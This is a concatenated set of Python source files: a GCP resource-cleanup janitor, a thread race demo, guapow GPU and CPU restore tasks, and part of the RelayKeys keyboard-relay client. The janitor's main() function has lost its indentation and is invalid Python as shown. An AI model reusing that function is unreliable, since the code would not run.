    the resource tolerates errors.
    Args:
        cmd: command argv list to execute.
        tolerate: if True, failures are logged but not recorded in errs.
        name: resource name, used in the error message.
        errs: shared list collecting CalledProcessError instances.
        lock: threading.Lock guarding errs (called from worker threads).
        hide_output: if True, discard the command's stdout.
    """
    log('Call %r' % cmd)
    try:
        if hide_output:
            # FIX: use a context manager so the devnull handle is always
            # closed (it was previously leaked).
            with open(os.devnull, 'w') as fnull:
                subprocess.check_call(cmd, stdout=fnull)
        else:
            subprocess.check_call(cmd)
    except subprocess.CalledProcessError as exc:
        if not tolerate:
            with lock:
                errs.append(exc)
        print >> sys.stderr, 'Error try to delete resources %s: %r' % (name, exc)
def clear_resources(project, cols, resource, rate_limit):
    """Clear a collection of resource, from collect func above.
    Args:
        project: The name of a gcp project.
        cols: A dict of collection of resource.
        resource: Definition of a type of gcloud resource.
        rate_limit: how many resources to delete per gcloud delete call
    Returns:
        0 if no error
        > 0 if deletion command fails
    """
    errs = []
    threads = list()
    lock = threading.Lock()
    # delete one resource at a time, if there's no api support
    # aka, logging sinks for example
    if not resource.bulk_delete:
        rate_limit = 1
    for col, items in cols.items():
        if ARGS.dryrun:
            log('Resource type %r(%r) to be deleted: %r' %
                (resource.name, resource.subgroup, list(items)))
            continue
        manage_key = {'Yes': 'managed', 'No': 'unmanaged'}
        # construct the customized gcloud command
        base = base_command(resource)
        if resource.managed:
            base.append(manage_key[resource.managed])
        base.append('delete')
        base.append('--project=%s' % project)
        condition = None
        if resource.condition:
            if col:
                # scope the delete to the zone/region the items came from
                condition = '--%s=%s' % (resource.condition, col)
            else:
                condition = '--global'
        log('going to delete %d %s' % (len(items), resource.name))
        # try to delete at most $rate_limit items at a time
        for idx in xrange(0, len(items), rate_limit):
            clean = items[idx:idx + rate_limit]
            cmd = base + list(clean)
            if condition:
                cmd.append(condition)
            # each gcloud delete batch runs in its own thread
            thread = threading.Thread(
                target=asyncCall, args=(cmd, resource.tolerate, resource.name, errs, lock, False))
            threads.append(thread)
            log('start a new thread, total %d' % len(threads))
            thread.start()
    log('Waiting for all %d thread to finish' % len(threads))
    for thread in threads:
        thread.join()
    return len(errs)
def clean_gke_cluster(project, age, filt):
    """Clean up potential leaking gke cluster.
    Args:
        project: The name of a gcp project.
        age: Time cutoff; clusters created before it are deleted.
        filt: Filter clause for the gcloud list command.
    Returns:
        True if any deletion failed, False otherwise.
    """
    # a cluster can be created in one of those three endpoints
    endpoints = [
        'https://test-container.sandbox.googleapis.com/',  # test
        'https://staging-container.sandbox.googleapis.com/',  # staging
        'https://container.googleapis.com/',  # prod
    ]
    errs = []
    for endpoint in endpoints:
        threads = list()
        lock = threading.Lock()
        # point the gcloud container commands at this endpoint
        os.environ['CLOUDSDK_API_ENDPOINT_OVERRIDES_CONTAINER'] = endpoint
        log("checking endpoint %s" % endpoint)
        cmd = [
            'gcloud', 'container', '-q', 'clusters', 'list',
            '--project=%s' % project,
            '--filter="%s"' % filt,
            '--format=json(name,createTime,zone)'
        ]
        log('running %s' % cmd)
        output = ''
        try:
            output = subprocess.check_output(cmd)
        except subprocess.CalledProcessError as exc:
            # expected error
            log('Cannot reach endpoint %s with %r, continue' % (endpoint, exc))
            continue
        for item in json.loads(output):
            log('cluster info: %r' % item)
            if 'name' not in item or 'createTime' not in item or 'zone' not in item:
                raise ValueError('name, createTime and zone must present: %r' % item)
            # The raw createTime string looks like 2017-08-30T18:33:14+00:00
            # Which python 2.7 does not support timezones.
            # Since age is already in UTC time we'll just strip the timezone part
            item['createTime'] = item['createTime'].split('+')[0]
            created = datetime.datetime.strptime(
                item['createTime'], '%Y-%m-%dT%H:%M:%S')
            if created < age:
                log('Found stale gke cluster %r in %r, created time = %r' %
                    (item['name'], endpoint, item['createTime']))
                delete = [
                    'gcloud', 'container', '-q', 'clusters', 'delete',
                    item['name'],
                    '--project=%s' % project,
                    '--zone=%s' % item['zone'],
                ]
                # delete each stale cluster in its own thread (output hidden)
                thread = threading.Thread(
                    target=asyncCall, args=(delete, False, item['name'], errs, lock, True))
                threads.append(thread)
                log('start a new thread, total %d' % len(threads))
                thread.start()
        log('Waiting for all %d thread to finish in %s' % (len(threads), endpoint))
        for thread in threads:
            thread.join()
    return len(errs) > 0
def activate_service_account(service_account):
    """ Activate a gcloud service account from a key file.
    Args:
        service_account: path to the service account key file.
    Returns:
        0 on success, 1 if activation fails.
    """
    print '[=== Activating service_account %s ===]' % service_account
    cmd = [
        'gcloud', 'auth', 'activate-service-account',
        '--key-file=%s' % service_account,
    ]
    log('running %s' % cmd)
    try:
        subprocess.check_call(cmd)
    except subprocess.CalledProcessError:
        print >> sys.stderr, 'Error try to activate service_account: %s' % service_account
        return 1
    return 0
def main(project, days, hours, filt, rate_limit, service_account):
""" Clean up resources from a gcp project based on it's creation time
Args:
project: The name of a gcp project.
days/hours: days/hours of maximum lifetime of a gcp resource.
filt: Resource instance filters when query.
Returns:
0 if no error
1 if list or delete command fails
"""
print '[=== Start Janitor on project %r ===]' % project
err = 0
age = datetime.datetime.utcnow() - datetime.timedelta(days=days, hours=hours)
clear_all = (days is 0 and hours is 0)
if service_account:
err |= activate_service_account(service_account)
if not err:
for res in DEMOLISH_ORDER:
log('Try to search for %r with condition %r' % (res.name, res.condition))
try:
col = collect(project, age, res, filt, clear_all)
if col:
err |= clear_resources(project, col, res, rate_limit)
except (subprocess.CalledProcessError, ValueError):
err |= 1 # keep clean the other resource
print >> sys.stderr, 'Fail to list resource %r from project %r' \
% (res.name, project)
# try to clean leaking gke cluster
try:
err |= clean_gke_cluster(project, age, filt)
except ValueError:
err |= 1 # keep clean the other resource
print >> sys.stderr, 'Fail to clean up cluster from project %r' % project
print '[=== Finish Janitor on project %r with status %r ===]' % (project, err)
sys.exit(err)
if __name__ == '__main__':
    # parse CLI flags into the module-level ARGS used by log()/clear_resources()
    PARSER = argparse.ArgumentParser(
        description='Clean up resources from an expired project')
    PARSER.add_argument('--project', help='Project to clean', required=True)
    PARSER.add_argument(
        '--days', type=int,
        help='Clean items more than --days old (added to --hours)')
    PARSER.add_argument(
        '--hours', type=float,
        help='Clean items more than --hours old (added to --days)')
    PARSER.add_argument(
        '--filter',
        default='name !~ ^default',
        help='Filter down to these instances')
    PARSER.add_argument(
        '--dryrun',
        default=False,
        action='store_true',
        help='List but not delete resources')
    PARSER.add_argument(
        '--ratelimit', type=int, default=50,
        help='Max number of resources to bulk clear in one gcloud delete call')
    PARSER.add_argument(
        '--verbose', action='store_true',
        help='Get full janitor output log')
    PARSER.add_argument(
        '--service_account',
        help='GCP service account',
        default=os.environ.get("GOOGLE_APPLICATION_CREDENTIALS", None))
    ARGS = PARSER.parse_args()
    # We want to allow --days=0 and --hours=0, so check against None instead.
    if ARGS.days is None and ARGS.hours is None:
        print >> sys.stderr, 'must specify --days and/or --hours'
        sys.exit(1)
    main(ARGS.project, ARGS.days or 0, ARGS.hours or 0, ARGS.filter,
         ARGS.ratelimit, ARGS.service_account)
|
foo.py | # Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
# Shared counter mutated by both threads; deliberately unsynchronized to
# demonstrate the race condition.
i = 0
def incrementingFunction():
    """Increment the shared global counter one million times (no locking)."""
    global i
    for _ in range(1000000):
        i += 1
def decrementingFunction():
    """Decrement the shared global counter one million times (no locking)."""
    global i
    for _ in range(1000000):
        i -= 1
def main():
    # 'global i' declared here per the exercise note "(needed to print i)";
    # strictly, reading a module-level name does not require it.
    global i
    incrementing = Thread(target = incrementingFunction, args = (),)
    decrementing = Thread(target = decrementingFunction, args = (),)
    # start both threads so their unsynchronized updates interleave
    incrementing.start()
    decrementing.start()
    # wait for both to finish before reading the (racy) result
    incrementing.join()
    decrementing.join()
    # without a lock around i's updates this rarely prints 0
    print("The magic number is %d" % (i))
main()
|
task.py | import asyncio
import re
import traceback
from abc import ABC, abstractmethod
from multiprocessing import Process
from re import Pattern
from typing import List, Optional, Dict, Set, Tuple, Type, Awaitable
from guapow.common import system
from guapow.common.scripts import RunScripts
from guapow.common.users import is_root_user
from guapow.service.optimizer.gpu import GPUState, GPUDriver
from guapow.service.optimizer.post_process.context import PostProcessContext
from guapow.service.optimizer.task.model import OptimizationContext, CPUState
class PostProcessTask(ABC):
    """Base interface for tasks executed after an optimized process finishes."""

    @abstractmethod
    def __init__(self, context: OptimizationContext):
        pass

    @abstractmethod
    def should_run(self, context: PostProcessContext) -> bool:
        # return True when this task applies to the given post-process context
        pass

    @abstractmethod
    async def run(self, context: PostProcessContext):
        # perform the task (may await system/driver calls)
        pass
class RestoreGPUState(PostProcessTask):
    """Restores the power mode of GPUs that were changed during optimization."""

    def __init__(self, context: OptimizationContext):
        super(RestoreGPUState, self).__init__(context)
        self._gpu_man = context.gpu_man
        self._log = context.logger

    def should_run(self, context: PostProcessContext) -> bool:
        # only run when there are saved GPU states to restore
        return bool(context.restorable_gpus)

    async def _restore(self, driver: GPUDriver, states: List[GPUState], user_env: Optional[dict]):
        """Restore the saved power modes of every GPU handled by *driver*."""
        async with driver.lock():
            gpus_states = {}  # hold all states mapped to the same GPU
            for state in states:
                modes = gpus_states.get(state.id, set())
                gpus_states[state.id] = modes
                modes.add(state.power_mode)
            gpus_current_modes = await driver.get_power_mode({*gpus_states.keys()}, user_env)
            gpus_to_restore = {}
            for id_, modes in gpus_states.items():
                # if there is more than one mode mapped to same GPU, a default mode is preferred
                mode = [*modes][0] if len(modes) == 1 else driver.get_default_mode()
                current_mode = gpus_current_modes.get(id_)
                if mode:
                    if mode != current_mode:
                        gpus_to_restore[id_] = mode
                    else:
                        self._log.info(f"It is not necessary to restore {driver.get_vendor_name()} GPU ({id_}) to "
                                       f"'{mode.name.lower()}' mode")
                else:
                    self._log.error(f"Current mode unknown for {driver.get_vendor_name()} GPU '{id_}'")
            if gpus_to_restore:
                self._log.debug(f"Restoring power mode of {driver.get_vendor_name()} GPUS: "
                                f"{', '.join(gpus_to_restore)}")
                gpus_changed = await driver.set_power_mode(gpus_to_restore, user_env)
                if gpus_changed:
                    if not self._log.disabled:
                        not_restored = {gpu for gpu, changed in gpus_changed.items() if not changed}
                        if not_restored:
                            # NOTE(review): this logs every attempted GPU, not
                            # just the failed ones (not_restored) — confirm
                            self._log.error(f"Could not restore power mode of {driver.get_vendor_name()} GPUS: "
                                            f"{', '.join(gpus_changed)}")
                else:
                    self._log.error(f"Could not restore power mode of {driver.get_vendor_name()} GPUs: "
                                    f"{', '.join(gpus_to_restore.keys())}")

    async def run(self, context: PostProcessContext):
        # restore the GPUs of every driver concurrently
        restore_tasks = []
        for driver in self._gpu_man.get_drivers():
            states = context.restorable_gpus.get(driver.__class__)
            if states:
                restore_tasks.append(self._restore(driver, states, context.user_env))
        if restore_tasks:
            await asyncio.gather(*restore_tasks)
class RestoreCPUGovernor(PostProcessTask):
    """Restores the CPU frequency governors that were changed during optimization."""

    def __init__(self, context: OptimizationContext):
        self._cpufreq_man = context.cpufreq_man
        self._log = context.logger

    def should_run(self, context: PostProcessContext) -> bool:
        return bool(context.restorable_cpus)

    def _map_governors(self, governors: List[Dict[str, Set[int]]]) -> Tuple[Dict[str, Set[int]], Dict[int, Set[str]]]:
        """Merge a list of governor->CPUs mappings into two indexes:
        governor -> all its CPUs, and CPU -> all governors mapped to it."""
        governor_cpus, cpu_governors = {}, {}
        if governors:
            for govs in governors:
                if govs:  # previous governors may be unknown (e.g. they were already 'performance' at save time)
                    for gov, cpus in govs.items():
                        gov_cpus = governor_cpus.get(gov, set())
                        gov_cpus.update(cpus)
                        governor_cpus[gov] = gov_cpus
                        for cpu in cpus:
                            # FIX: renamed from 'govs', which shadowed the outer loop variable
                            cpu_govs = cpu_governors.get(cpu, set())
                            cpu_govs.add(gov)
                            cpu_governors[cpu] = cpu_govs
        return governor_cpus, cpu_governors

    def map_governors(self, cpu_states: List[CPUState]) -> Tuple[Dict[str, Set[int]], Dict[int, Set[str]]]:
        """Map governors from the saved CPU states, falling back to the
        cpufreq manager's persisted governors when none are available."""
        governor_cpus, cpu_governors = self._map_governors([state.governors for state in cpu_states])
        if not governor_cpus:
            governor_cpus, cpu_governors = self._map_governors([self._cpufreq_man.get_saved_governors()])
        return governor_cpus, cpu_governors

    def _remove_duplicates(self, governor_cpus: Dict[str, Set[int]], cpu_governors: Dict[int, Set[str]]):
        """
        if there is a CPU mapped to several governors, remove it from the governors with less CPUs mapped
        """
        sorted_governors_cpus = [g for n, g in sorted([(len(c), g) for g, c in governor_cpus.items()], reverse=True)]
        to_remove = {}  # governor -> CPUs to drop from it
        for cpu, governors in cpu_governors.items():
            if len(governors) > 1:
                # keep the CPU only under the governor with the most CPUs mapped
                pref_gov_idx, pref_gov = None, None
                for gov in governors:
                    gov_prio = sorted_governors_cpus.index(gov)
                    if pref_gov_idx is None or pref_gov_idx > gov_prio:
                        pref_gov_idx = gov_prio
                        pref_gov = gov
                for gov in governors:
                    if gov != pref_gov:
                        gov_cpus = to_remove.get(gov, set())
                        to_remove[gov] = gov_cpus
                        gov_cpus.add(cpu)
        for gov, cpus_to_remove in to_remove.items():
            for cpu in cpus_to_remove:
                governor_cpus[gov].remove(cpu)

    def _cpus_to_str(self, cpus: Set[int]):
        return ','.join((str(c) for c in cpus))

    async def run(self, context: PostProcessContext):
        async with self._cpufreq_man.lock():
            governor_cpus, cpu_governors = self.map_governors(context.restorable_cpus)
            if governor_cpus:
                if len(governor_cpus) == 1:
                    # single governor: restore all CPUs in one call
                    governor = [*governor_cpus][0]
                    cpus = governor_cpus[governor]
                    self._log.debug(f"Restoring CPUs ({self._cpus_to_str(cpus)}) governors to '{governor}'")
                    await self._cpufreq_man.change_governor(governor, cpus)
                else:
                    self._remove_duplicates(governor_cpus, cpu_governors)
                    for governor, cpus in governor_cpus.items():
                        if cpus:
                            self._log.debug(f"Restoring CPUs ({self._cpus_to_str(cpus)}) governors to '{governor}'")
                            await self._cpufreq_man.change_governor(governor, cpus)
            else:
                # BUG FIX: message previously read "could be restored", missing the 'not'
                self._log.warning('Previous CPU governors could not be restored because they are unknown')
class PostStopProcesses(PostProcessTask):
    """Kills the processes related to the optimized one, including their children."""

    def __init__(self, context: OptimizationContext):
        self._log = context.logger

    def should_run(self, context: PostProcessContext) -> bool:
        return bool(context.pids_to_stop)

    async def run(self, context: PostProcessContext):
        self._log.debug("Finding children of related processes")
        children = await system.find_children({*context.pids_to_stop})
        if children:
            self._log.debug(f"Children of related processes found: {' '.join([str(p) for p in children])}")
        else:
            children = []
            self._log.debug("No children of related processes found")
        # children are listed before the originally tracked pids in the kill command
        all_to_stop = ' '.join((str(p) for p in (*children, *context.pids_to_stop)))
        self._log.info(f'Stopping related processes: {all_to_stop}')
        code, _ = await system.async_syscall(f'kill -9 {all_to_stop}', return_output=False)
        if code != 0:
            self._log.error(f'Not all related processes could be stopped: {all_to_stop}')
class ReEnableWindowCompositor(PostProcessTask):
    """Re-enables the desktop window compositor if it was disabled earlier."""

    def __init__(self, context: OptimizationContext):
        self._log = context.logger
        self._context = context

    def should_run(self, context: PostProcessContext) -> bool:
        # Requires: an explicit restore request, a known compositor, and the
        # context object saved when the compositor was disabled.
        return bool(context.restore_compositor and self._context.compositor and self._context.compositor_disabled_context is not None)

    async def run(self, context: PostProcessContext):
        compositor, compositor_context = self._context.compositor, self._context.compositor_disabled_context
        async with compositor.lock():
            enabled = await compositor.is_enabled(user_id=context.user_id, user_env=context.user_env, context=compositor_context)
            if enabled is None:
                # Unknown state: do not blindly toggle the compositor.
                self._log.error("Could not re-enable the window compositor. It was not possible to determine its current state")
                return
            elif enabled:
                self._log.info("It was not necessary to enable the window compositor. It is already enabled.")
                self._context.compositor_disabled_context = None  # resetting the global context
            else:
                if await compositor.enable(user_id=context.user_id, user_env=context.user_env, context=compositor_context):
                    self._log.info("Window compositor re-enabled")
                    self._context.compositor_disabled_context = None  # resetting the global context
                else:
                    self._log.error("Could not re-enable the window compositor")
class RunFinishScripts(PostProcessTask):
    """Executes the user-defined 'finish' scripts when an optimized process ends."""

    def __init__(self, context: OptimizationContext):
        self._context = context
        self._log = context.logger
        # Delegates the actual execution to the shared RunScripts task.
        self._task = RunScripts('finish', context.allow_root_scripts, self._log)

    def should_run(self, context: PostProcessContext) -> bool:
        # Run only when at least one settings object actually defines scripts.
        # (idiom fix: replaces a manual loop-with-early-return by any())
        return bool(context.scripts) and any(settings.scripts for settings in context.scripts)

    async def run(self, context: PostProcessContext):
        await self._task.run(scripts=context.scripts, user_id=context.user_id, user_env=context.user_env)
class RelaunchStoppedProcesses(PostProcessTask):
    """Relaunches processes that were stopped during the optimization phase."""

    def __init__(self, context: OptimizationContext):
        self._context = context
        self._log = context.logger
        self._re_python_cmd: Optional[Pattern] = None

    def get_python_cmd_pattern(self) -> Pattern:
        """Lazily compile the pattern that strips an interpreter prefix from
        commands like '/usr/bin/python3 /path/app.py'."""
        if self._re_python_cmd is None:
            self._re_python_cmd = re.compile(r'^/.+/python\d*\s+(/.+)$')
        return self._re_python_cmd

    def should_run(self, context: PostProcessContext) -> bool:
        return bool(context.stopped_processes and context.user_id is not None)

    async def _run_command(self, name: str, cmd: str):
        """Relaunch a process as the current user (fire-and-forget)."""
        try:
            await system.async_syscall(cmd, return_output=False, wait=False)
            self._log.info(f"Process '{name}' ({cmd}) relaunched")
        except Exception:  # fix: was a bare 'except', which also swallows SystemExit/KeyboardInterrupt
            stack_log = traceback.format_exc().replace('\n', ' ')
            self._log.warning(f"An exception happened when relaunching process '{name}' ({cmd}): {stack_log}")

    def _run_user_command(self, name: str, cmd: str, user_id: int, user_env: Optional[Dict[str, str]] = None):
        """Relaunch a process on behalf of 'user_id' through a daemon subprocess."""
        try:
            Process(daemon=True, target=system.run_user_command, kwargs={'cmd': cmd, 'user_id': user_id, 'env': user_env, 'wait': False}).start()
            self._log.info(f"Process '{name}' ({cmd}) relaunched (user={user_id})")
        except Exception:  # fix: was a bare 'except'
            stack_log = traceback.format_exc().replace('\n', ' ')
            self._log.warning(f"An exception happened when relaunching process '{name}' ({cmd}) [user={user_id}]: {stack_log}")

    async def run(self, context: PostProcessContext):
        self_is_root = is_root_user()
        root_request = is_root_user(context.user_id)
        if not self_is_root and root_request:
            # A non-root daemon cannot spawn root-owned processes.
            self._log.warning(f"It will not be possible to launch the following root processes: {', '.join((c[0] for c in context.stopped_processes))}")
            return
        running_cmds = await system.find_processes_by_command({p[1] for p in context.stopped_processes})
        for comm_cmd in context.stopped_processes:
            name, cmd = comm_cmd[0], comm_cmd[1]
            if running_cmds and cmd in running_cmds:
                self._log.warning(f"Process '{name}' ({cmd}) is alive. Skipping its relaunching.")
                continue
            # Strip an explicit interpreter path so scripts relaunch via their shebang.
            python_cmd = self.get_python_cmd_pattern().findall(cmd)
            real_cmd = python_cmd[0] if python_cmd else cmd
            if self_is_root:
                if root_request:
                    await self._run_command(name, real_cmd)
                else:
                    self._run_user_command(name, real_cmd, context.user_id, context.user_env)
            else:
                await self._run_command(name, real_cmd)
class RestoreMouseCursor(PostProcessTask):
    """Makes the mouse cursor visible again when a restore was requested."""

    def __init__(self, context: OptimizationContext):
        self._log = context.logger
        # Keep a direct reference to the mouse manager taken from the context.
        self._mouse_man = context.mouse_man

    def should_run(self, context: PostProcessContext) -> bool:
        # Only meaningful when the cursor restore flag is set.
        return bool(context.restore_mouse_cursor)

    async def run(self, context: PostProcessContext):
        # Delegate the actual un-hiding to the mouse manager.
        await self._mouse_man.show_cursor()
class RestoreCPUEnergyPolicyLevel(PostProcessTask):
    """Restores the previously saved per-CPU energy policy levels."""

    def __init__(self, context: OptimizationContext):
        self._log = context.logger
        self._man = context.cpuenergy_man

    def should_run(self, context: PostProcessContext):
        return context.restore_cpu_energy_policy

    async def run(self, context: PostProcessContext):
        async with self._man.lock():
            saved_state = self._man.saved_state
            if not saved_state:
                self._log.info("No CPU energy policy level saved state to restore")
                return
            self._log.info(f"Restoring CPUs energy policy levels: "
                           f"{', '.join(f'{idx}={state}' for idx, state in sorted(saved_state.items()))}")
            cpus_changed = await self._man.change_states(saved_state)
            if not cpus_changed:
                self._log.error("Could not restore CPUs energy policy levels")
                return
            restored, not_restored = [], []
            for idx, changed in cpus_changed.items():
                # fix: keep indexes as ints on both lists so the warning below
                # sorts numerically (the old code stringified failures first,
                # which sorted '10' before '2').
                if changed:
                    restored.append(idx)
                else:
                    not_restored.append(idx)
            if not_restored:
                self._log.warning(f"Could not restore the energy policy levels of the following CPUs: "
                                  f"{', '.join(str(i) for i in sorted(not_restored))}")
            if restored:
                self._man.clear_state(*restored)
                self._log.debug(f"Saved CPUs energy policy levels cleared: "
                                f"{', '.join(str(i) for i in sorted(restored))}")
class PostProcessTaskManager:
    """Instantiates the available PostProcessTask subclasses and fixes their execution order."""

    # Explicit priority per task type; unknown tasks sink to the end (100).
    __ORDER: Dict[Type[PostProcessTask], int] = {ReEnableWindowCompositor: 0,
                                                 PostStopProcesses: 1,
                                                 RestoreMouseCursor: 2,
                                                 RestoreGPUState: 3,
                                                 RestoreCPUGovernor: 4,
                                                 RestoreCPUEnergyPolicyLevel: 5,
                                                 RelaunchStoppedProcesses: 6,
                                                 RunFinishScripts: 7}

    def __init__(self, context: OptimizationContext, tasks: Optional[List[PostProcessTask]] = None):
        if tasks:
            self._tasks = tasks
        else:
            # Instantiate every concrete PostProcessTask subclass with the shared context.
            self._tasks = [cls(context) for cls in PostProcessTask.__subclasses__() if cls != self.__class__]
        self._tasks.sort(key=self._sort)

    def _sort(self, task: PostProcessTask) -> int:
        return self.__ORDER.get(task.__class__, 100)

    def get_available_tasks(self):
        # Return a shallow copy so callers cannot mutate the internal list.
        return [*self._tasks]

    def create_tasks(self, context: PostProcessContext) -> Optional[List[Awaitable]]:
        """Build the coroutine list for all tasks whose should_run() accepts the context."""
        if self._tasks:
            to_run = [task.run(context) for task in self._tasks if task.should_run(context)]
            if to_run:
                return to_run
|
relaykeys-qt.py | # -*- coding: utf-8 -*-
import os
from time import sleep, time
from sys import exit, argv
import sys
# util modules
import logging
import argparse
from configparser import ConfigParser
import traceback
from relaykeysclient import RelayKeysClient
import pyWinhook as PyHook3
from PyQt5.QtCore import pyqtSignal, Qt, pyqtSlot, QObject, QThread, QUrl
from PyQt5.QtGui import QIcon, QDesktopServices
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QApplication, QSystemTrayIcon, \
QMessageBox, QLabel, QAction, QMenu, QMenuBar, QDialog, QPushButton, QMainWindow
from struct import pack, unpack
import win32api
import win32con
import pythoncom
from threading import Timer, Thread
from queue import Queue, Empty as EmptyQueue
# Command-line interface for the Qt client.
parser = argparse.ArgumentParser(description='Relay Keys qt client.')
parser.add_argument('--debug', dest='debug', action='store_const',
                    const=True, default=False,
                    help='set logger to debug level')
parser.add_argument('--config', '-c', dest='config',
                    default=None, help='Path to config file')
parser.add_argument('--url', '-u', dest='url', default=None,
                    help='rpc http url, default: http://localhost:5383/')

# BLE devices last reported by the daemon (module-level scratch list).
devList = []
# Windows virtual-key code -> RelayKeys modifier name (left/right variants).
modifiers_map = dict([
    (162, "LCTRL"),
    (163, "RCTRL"),
    (160, "LSHIFT"),
    (161, "RSHIFT"),
    (165, "RALT"),
    (164, "LALT"),
    (0x5B, "LMETA"),
    (0x5C, "RMETA"),
])
# Windows virtual-key code -> RelayKeys key name.
# fix: the original dict([...]) silently collapsed duplicate keys:
#   - 13 ("ENTER") and 0x03 ("CANCEL") each appeared twice (same value, dead entries)
#   - 33 appeared as "PAGEUP" and was then overridden by (0x21, "PRIOR")
# Duplicates are removed below; the effective 33 -> "PRIOR" mapping is preserved.
keysmap = {
    65: "A",
    66: "B",
    67: "C",
    68: "D",
    69: "E",
    70: "F",
    71: "G",
    72: "H",
    73: "I",
    74: "J",
    75: "K",
    76: "L",
    77: "M",
    78: "N",
    79: "O",
    80: "P",
    81: "Q",
    82: "R",
    83: "S",
    84: "T",
    85: "U",
    86: "V",
    87: "W",
    88: "X",
    89: "Y",
    90: "Z",
    49: "1",
    50: "2",
    51: "3",
    52: "4",
    53: "5",
    54: "6",
    55: "7",
    56: "8",
    57: "9",
    48: "0",
    190: "PERIOD",
    188: "COMMA",
    186: "SEMICOLON",
    0xBD: "MINUS",  # VK_OEM_MINUS
    187: "EQUALS",
    191: "SLASH",
    220: "BACKSLASH",
    222: "QUOTE",
    219: "LEFTBRACKET",
    221: "RIGHTBRACKET",
    13: "ENTER",  # VK_RETURN (was listed twice in the original)
    32: "SPACE",
    8: "BACKSPACE",
    9: "TAB",
    445: "UNDERSCORE",
    # NOTE(review): the original also listed 33 as "PAGEUP" before overriding
    # it with VK_PRIOR below; the effective value is kept — confirm intent.
    0x21: "PRIOR",  # VK_PRIOR (Page Up)
    34: "PAGEDOWN",
    37: "LEFTARROW",
    39: "RIGHTARROW",
    38: "UPARROW",
    40: "DOWNARROW",
    27: "ESCAPE",
    36: "HOME",
    35: "END",
    45: "INSERT",
    46: "DELETE",
    93: "APP",  # Applications key
    20: "CAPSLOCK",
    112: "F1",
    113: "F2",
    114: "F3",
    115: "F4",
    116: "F5",
    117: "F6",
    118: "F7",
    119: "F8",
    120: "F9",
    121: "F10",
    122: "F11",
    123: "F12",
    0xC0: "BACKQUOTE",  # Keyboard Non-US # and ~
    0x2C: "PRINTSCREEN",  # Keyboard PrintScreen, VK_SNAPSHOT
    0x2B: "EXECUTE",  # VK_EXECUTE
    0x2F: "HELP",  # VK_HELP
    0x12: "MENU",  # VK_MENU
    0x13: "PAUSE",  # VK_PAUSE
    0x29: "SELECT",  # VK_SELECT
    0xB2: "STOP",  # VK_MEDIA_STOP, Keyboard Stop
    0xAD: "MUTE",  # VK_VOLUME_MUTE
    0xAF: "VOLUP",  # VK_VOLUME_UP, Keyboard Volume Up
    0xAE: "VOLDOWN",  # VK_VOLUME_DOWN, Keyboard Volume Down
    0x03: "CANCEL",  # VK_CANCEL (was listed twice in the original)
    0x0C: "CLEAR",  # VK_CLEAR, Keyboard Clear
    0x6C: "SEPARATOR",  # VK_SEPARATOR
    0x5F: "POWER",  # VK_SLEEP
    0x60: "KP_0",  # VK_NUMPAD0
    0x61: "KP_1",  # VK_NUMPAD1
    0x62: "KP_2",  # VK_NUMPAD2
    0x63: "KP_3",  # VK_NUMPAD3
    0x64: "KP_4",  # VK_NUMPAD4
    0x65: "KP_5",  # VK_NUMPAD5
    0x66: "KP_6",  # VK_NUMPAD6
    0x67: "KP_7",  # VK_NUMPAD7
    0x68: "KP_8",  # VK_NUMPAD8
    0x69: "KP_9",  # VK_NUMPAD9
    0x6E: "KP_PERIOD",  # VK_DECIMAL
    0x6A: "KP_MULTIPLY",  # keypad multiply, VK_MULTIPLY
    0x6F: "KP_DIVIDE",  # keypad divide, VK_DIVIDE
    0x6B: "KP_PLUS",
    0x6D: "KP_MINUS",
}
# Windows virtual-key code -> printable character(s) for the "last chars" display.
# A tuple value is (unshifted, shifted); a string is used as-is; "" means the
# key produces no printable character.
# fix: the original dict([...]) listed key 13 twice (13 and 0x0D, both "");
# the duplicate is removed.
char_keysmap = {
    65: ("a", "A"),
    66: ("b", "B"),
    67: ("c", "C"),
    68: ("d", "D"),
    69: ("e", "E"),
    70: ("f", "F"),
    71: ("g", "G"),
    72: ("h", "H"),
    73: ("i", "I"),
    74: ("j", "J"),
    75: ("k", "K"),
    76: ("l", "L"),
    77: ("m", "M"),
    78: ("n", "N"),
    79: ("o", "O"),
    80: ("p", "P"),
    81: ("q", "Q"),
    82: ("r", "R"),
    83: ("s", "S"),
    84: ("t", "T"),
    85: ("u", "U"),
    86: ("v", "V"),
    87: ("w", "W"),
    88: ("x", "X"),
    89: ("y", "Y"),
    90: ("z", "Z"),
    49: "1",
    50: "2",
    51: "3",
    52: "4",
    53: "5",
    54: "6",
    55: "7",
    56: "8",
    57: "9",
    48: "0",
    190: ".",
    188: ",",
    186: ";",
    0xBD: "-",  # VK_OEM_MINUS
    187: "=",
    191: "/",
    220: "\\",
    222: "'",
    219: ("[", "{"),
    221: ("]", "}"),
    13: "",  # ENTER / VK_RETURN (was listed twice in the original)
    32: "",  # SPACE
    8: "",  # BACKSPACE
    9: "",  # TAB
    445: "_",  # UNDERSCORE
    0xC0: "~",  # Keyboard Non-US # and ~
}
class KeyboardStatusWidget (QWidget):
    """Horizontal strip of labels showing currently pressed keys, modifiers
    and unknown key codes, joined by '+' separators."""

    # Emitted (from any thread) with (keys, modifiers, unknown_keys) to refresh.
    updateStatusSignal = pyqtSignal(list, list, list)

    def __init__(self):
        super(KeyboardStatusWidget, self).__init__()
        self.updateStatusSignal.connect(self.onUpdateStatus)
        self.hlayout = QHBoxLayout()
        self.hlayout.setAlignment(Qt.AlignLeft)
        self.items = []
        self.hlayout.setContentsMargins(0, 0, 0, 0)
        self.setLayout(self.hlayout)

    def _addItemLabel(self, html):
        """Append one styled QLabel (wrapped in a QVBoxLayout) to the strip.

        fix: this construction sequence was copy-pasted four times in the
        original (addPlusLabel and three loops in onUpdateStatus).
        """
        label = QLabel()
        label.setContentsMargins(5, 5, 5, 5)
        label.setAlignment(Qt.AlignVCenter)
        label.setText(html)
        item = QVBoxLayout()
        item.addWidget(label)
        self.items.append(item)
        self.hlayout.addLayout(item)

    def addPlusLabel(self):
        """Append a '+' separator label."""
        fontsize = 10
        self._addItemLabel("<font size='{fontsize}'>+</font>"
                           .format(fontsize=fontsize))

    def onUpdateStatus(self, keys, modifiers, unknown_keys):
        """Rebuild the strip from the current key state (GUI thread only)."""
        def layout_del_inner(layout):
            # Detach widgets so Qt can garbage-collect them.
            for i in reversed(range(layout.count())):
                layout.itemAt(i).widget().setParent(None)
        for item in self.items:
